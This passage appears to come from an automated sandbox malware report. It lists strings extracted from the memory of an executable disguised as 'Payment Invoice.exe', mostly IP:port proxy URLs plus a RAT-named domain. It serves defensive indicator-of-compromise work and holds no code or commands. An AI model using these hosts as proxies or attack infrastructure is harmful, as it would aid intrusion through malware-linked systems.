                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317066000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016317046000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.134.38:28695
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.134.38:28695://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.134.38:29718
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.134.38:29718://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.134.38:30747
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.134.38:30747://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.134.38:42571
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.134.38:42571://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.134.38:52929
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.134.38:52929://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316854000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.134.38:9375
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316854000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.134.38:9375://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.135.203:29212
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.135.203:29212://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.135.37:22942
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.135.37:22942://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.135.37:26927
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.135.37:26927://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.135.37:33899
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.135.37:33899://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.135.37:34824
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.135.37:34824://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.135.37:55019
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.135.37:55019://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.135.37:62969
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.135.37:62969://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.135.37:8623
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.135.37:8623://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.136.149:16691
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.136.149:16691://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.136.149:25137
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.204.136.149:25137://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.205.110.118:15430
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.205.110.118:15430://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.205.110.118:18374
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.205.110.118:18374://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.205.61.38:21286
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.205.61.38:21286://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.205.61.38:24183
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.205.61.38:24183://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.205.61.38:4300
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.205.61.38:4300://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631697E000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.207.253.226:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.207.253.226:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.247.12.136:9510
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.247.12.136:9510://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.247.2.26:21231
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.247.2.26:21231://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.255.190.41:4153
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://92.255.190.41:4153://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://93.157.248.108:88
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://93.157.248.108:88://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://93.171.220.229:8888
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://93.171.220.229:8888://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://93.171.224.51:4153
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://93.171.224.51:41530q
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://93.171.224.51:4153://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://93.171.241.18:1080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://93.171.241.18:1080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://93.171.243.253:1080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://93.171.243.253:1080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://93.182.76.244:5678
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://93.182.76.244:5678://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://93.188.161.84
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://93.188.161.84://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://93.188.161.84:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://93.190.142.57:41890
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://93.190.142.57:41890://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://93.190.24.119:443
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://93.190.24.119:443://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://93.42.151.10:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://93.42.151.10:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://93.43.193.2
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://93.43.193.230:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://93.43.193.230:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.101.179.153:9050
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.101.179.153:9050://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.124.16.218:8901
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.124.16.218:8901://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.130.94.45
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.130.94.45://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.130.94.45:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.131.106.196:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.131.106.196:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.131.107.45:1080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.131.107.45:1080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.131.203.7:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.131.203.7:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.153.159.98:4153
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.153.159.98:4153://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.153.163.226:81
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.153.163.226:81://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.153.252.170:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.153.252.170:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.154.152.4:8079
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.154.152.4:80795
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.154.152.4:8079://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.154.152.9:8079://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.154.221.91:5678
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.154.221.91:5678://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.186.234.236:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.186.234.236:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.228.194.18:41890
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.228.194.18:41890://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.23.168.246:5896
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.23.168.246:5896://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.23.220.136:25256
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.23.220.136:25256://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.232.125.200:5678
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.232.125.200:5678://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163199E5000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.154.124.114:58000
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.154.124.114:58000://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.164.89.123:8888
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.164.89.123:8888://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.165.163.188:60103
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.165.163.188:60103://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317BFA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.216.230.239
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317BCB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.216.230.239://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317BBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.216.230.239:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.217.104.21:24815
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.217.104.21:24815://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.217.222.
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.217.222.213:6969
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.217.222.213:6969://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.31.42.199:3629
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.31.42.199:3629://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.31.5.29:54651
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.31.5.29:54651://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.47.119.122:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.47.119.122:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.47.149.8:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.47.149.8:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016317BFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.56.254.139:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317BFA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.56.254.139:3128://proxyp
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.57.216.118:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.57.216.118:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.64.144.66:1080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.64.144.66:1080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.66.138.21:8880
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.66.138.21:8880://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.71.125.50:60867
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317A89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.71.125.50:608670q
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.71.125.50:60867://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.84.166.138:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.84.166.138:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://96.113.159.162
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163173A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://96.113.159.162://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631737F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://96.113.159.162:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://96.80.2
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://96.80.235.1:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://96.80.235.1:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://97.74.233.64:45780
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://97.74.233.64:45780://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://98.162.25.23:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://98.162.25.23:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://98.162.25.29:31679
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://98.162.25.29:31679://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://98.170.57.231:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://98.170.57.231:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://98.178.72.21:10919
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://98.178.72.21:10919://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://98.181.137.83:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://98.181.137.83:41450q
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://98.181.137.83:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://98.206.244.30:18301
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://98.206.244.30:18301://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://98.64.169.17:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://98.64.169.17:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318226000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://artemis-rat.com
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318547000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.00000163170E8000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.00000163182ED000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.000001631981A000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.00000163186D1000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.00000163186DD000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016319984000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://batit.aliyun.com/alww.html?id=00000000003887822894
                Source: Payment Invoice.exe, 00000000.00000002.3284545717.0000016314B5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pki.goog/gsr1/gsr1.crl0;
